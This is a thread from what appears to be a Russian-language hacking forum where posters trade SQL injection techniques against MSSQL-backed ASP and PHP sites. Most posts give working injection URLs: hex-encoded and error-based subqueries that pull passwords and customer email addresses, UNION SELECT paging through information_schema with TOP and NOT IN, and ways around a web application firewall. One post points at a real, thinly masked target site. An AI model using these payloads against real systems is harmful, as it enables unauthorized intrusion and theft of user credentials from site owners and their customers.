А если кодировать в хекс не только название таблицы а весь подзапрос: Code: http://site.com/resguides/Resguide.asp?ID=1+or+1=0x2873656C6563742B746F702B312B50617373776F72642B66726F6D2B5247417574686F7220286368696C64207461626C652929 Ответ: Code: ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. /resguides/Resguide.asp, line 16 Эт чё выходит что табла пустая?
Привет Всем. Столкнулся с такой проблемой: При запросе Выдает т.е. тут все норм далее ответ почему это происходит и как это обойти?
Как листать записи в mssql? делаю при помощи top - выдает одинаковые результаты. вот к примеру. site/script?id=-7+union+select+top+1+1,2,3,table_schema%2bchar(0x3a)%2btable_name+4,5+from+information_schema.columns-- при подстановке после top разных значений, не меняется вывод.
TOP обозначает количество первых записей в результирующей таблице. юзай NOT IN. Будет что-то вроде Code: site/script?id=-7 union select top 1 ... from information_schema.columns WHERE table_name NOT IN (SELECT TOP n table_name FROM information_schema)-- где n - номер записи
Спасибо. Чот не работает так. делаю по такой схеме. PHP: SELECT top 20 * FROM [some_table] WHERE [primary_key_field] NOT IN ( SELECT top 10 [primary_key_field] FROM [some_table] ORDER BY [primary_key_field] ) ORDER BY [primary_key_field] site/script?id=-7+union+select+top+1+1,2,3,table_name+4,5+from+information_schema.columns+where+table_name+NOT+IN+(SELECT+TOP+5+table_name+FROM+information_schema.columns+ORDER+BY+table_name)+ORDER+BY+table_name-- PS. Аа.. primary_key - это же id записи вроде как? Но в information_schema.columns нет primary_key ведь. Как быть?
?pid=443 or 1=(select top 1 table_name from information_schema.tables where table_name not in (SELECT TOP N table_name FROM information_schema.tables order by table_name))-- где N - номер с 0 до ..... Проверено работает.
hi! Thanks for your tutorials and help here. I have a question, I searched a lot but I didn't find any explanations. So here's the problem: Code: www.somesite.com/.../asp?id=1 after I put " ' " Code: www.somesite.com/.../asp?id=1 ' Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to numeric. I have tried many ways, but whatever I do the same error appears . My question is how to inject this one. Simply, nothing worked, I've even chared the whole query. If anyone could help, I'll appreciate that a lot! I can send link, but only on PM. Spasiba
Подскажите пожалуйста как закоментировать конец строки. -- не помогает: "Characters found after end of SQL statement."
Кто знает,что за ошибка такая ? Диз похож на mssql: Provider error '80020005' Type mismatch. реакция на 1+or+1=1
Какие ище есть методы с Выводом Данных? 1+or+1=(SELECT+TOP+1+cast(EmailAd dress+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+ nvarchar)+from+Customers)-- так уменя не идет
dotDefender Blocked Your Request Please contact the site administrator, and provide the following Reference ID: DCF2-8C56-108D-7E2D
стоит WAF http://www.applicure.com/ пробуй как-то обойти, по-моему децл не та тема, тем более нет ссылки. Подход в случае защиты к каждой скуле индивидуальный
В cлучаях если фильтруются оператор select и т.п, то узнать system_user(),db_name(), можно так ?id=user ?id=db_name()
Короче вот опять мои любимые музейщики http://www.r*c*xpo.com/*xhibition_ov*rvi*w.php?id=157' (заменим * на e). Там пых походу. Пробывал подставить конструкции из первого поста, но всегда выводится такое красивое число на белом фоне, как 1. Есть советы какие, м.б. кто сталкивался?
